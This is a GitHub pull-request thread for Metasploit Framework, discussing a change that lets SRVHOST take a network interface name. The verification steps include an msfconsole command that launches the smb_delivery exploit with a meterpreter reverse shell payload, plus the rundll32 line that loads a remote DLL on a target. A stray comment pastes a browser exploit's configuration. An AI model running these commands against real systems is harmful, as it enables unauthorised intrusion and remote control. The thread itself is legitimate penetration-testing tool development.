Use OptAddressLocal for SRVHOST to specify by interface name instead of IP

[cnotin]

Thanks to #8336 we can now specify LHOST by interface name instead of IP which is really nice.
I got this habit and now I want to apply it to SRVHOST too :)

Verification

• Start msfconsole -x "use windows/smb/smb_delivery; set srvhost eth0; set payload windows/meterpreter/reverse_tcp; set lhost eth0; run"
• Verify that you have (adapt for your eth0 IP):
  [*] Started service listener on 192.168.42.100:445
• Verify that you have:

[*] Run the following command on the target machine:
rundll32.exe \\192.168.42.100\fyBWzD\test.dll,0

• Verify that there is no "eth0" mentioned in the output

TODO:

• Document (any idea where?)
• Globalize to other modules which use "SRVHOST"

I will gladly do these remaining tasks if you like this PR :)

[smcintyre-r7]

I was slightly worried that this might prevent users from opening listening sockets via sessions but after some preliminary testing, that does not look like it is the case.

[wvu]

This looks like a good change!

[Kynepups]

msf exploit(ms13_069_caret) > set SRVPORT 80
SRVPORT => 80
msf exploit(ms13_069_caret) > set URIPATH /
URIPATH => /
.......#Next, let’s select the meterpreter reverse_https payload for windows.........
......msf exploit(ms13_069_caret) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf exploit(ms13_069_caret) > show options

Module options (exploit/windows/browser/ms13_069_caret):

Name Current Setting Required Description
 ---- --------------- -------- -----------
 SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
 SRVPORT 80 yes The local port to listen on.
 SSL false no Negotiate SSL for incoming connections
 SSLCert no Path to a custom SSL certificate (default is randomly generated)
 SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
 URIPATH / no The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_https):

Name Current Setting Required Description
 ---- --------------- -------- -----------
 EXITFUNC process yes Exit technique: seh, thread, process, none
 LHOST yes The local listener hostname
 LPORT 443 yes The local listener port

Exploit target:

Id Name
 -- ----
 0 IE 8 on Windows XP SP3

msf exploit(ms13_069_caret) >

[cnotin]

@Kynepups I think you didn't paste the correct thing or you're in the wrong issue 😉

[wvu]

#10094

[wvu]

Thanks for doing this, actually. The option hasn't seen much use since its inception (I think it was actually created for Pro). This addresses the primary use case in Framework.

[wvu]

Correct. See prior comment.

[wvu]

I'm linking issues for posterity.

[cnotin]

(yes sorry I was too fast, deleted mine)
It's a very handy feature!

[wvu]

I'm kind of amazed this didn't happen sooner, but I think we were trying to avoid regressions in a new feature. That was years ago by now. So this is a good upgrade.

[cnotin]

Yes preventing regressions is the main concern... I guess we'll see? :)

[wvu]

As for your to-dos, I think we can tweak the description a bit, and it should be "globalized" enough, since it's in SocketServer.

[wvu]

Cool, will wait for build to pass and then merge. I'll work on your other PRs in the meantime. :)

[wvu]

Release Notes

This converts the SRVHOST option from type OptAddress to OptAddressLocal, allowing a user to specify a network interface for Metasploit servers to listen on.

[Kynepups]

Okay... "did you solve problem master??"

…

On Wednesday, May 13, 2020, ♄ ***@***.***> wrote: Merged #13405 <#13405> into master. — You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub <#13405 (comment)>, or unsubscribe <https://github.com/notifications/unsubscribe-auth/AJWWUQEIGRVRWV5MQMCQZS3RRLGIRANCNFSM4M2VIYIQ> .

[cnotin]

@Kynepups if you have an issue to report, I suggest creating a separate issue on https://github.com/rapid7/metasploit-framework/issues and provide more information as suggested. Your previous messages aren't very explicit...

[Kynepups]

thanks

…

@Kynepups <https://github.com/Kynepups> if you have an issue to report, I suggest creating a separate issue on https://github.com/rapid7/ metasploit-framework/issues and provide more information as suggested. Your previous messages aren't very explicit... — You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub <#13405 (comment)>, or unsubscribe <https://github.com/notifications/unsubscribe-auth/AJWWUQGFUE2ZIVOCK6W7XRTRRLOPVANCNFSM4M2VIYIQ> .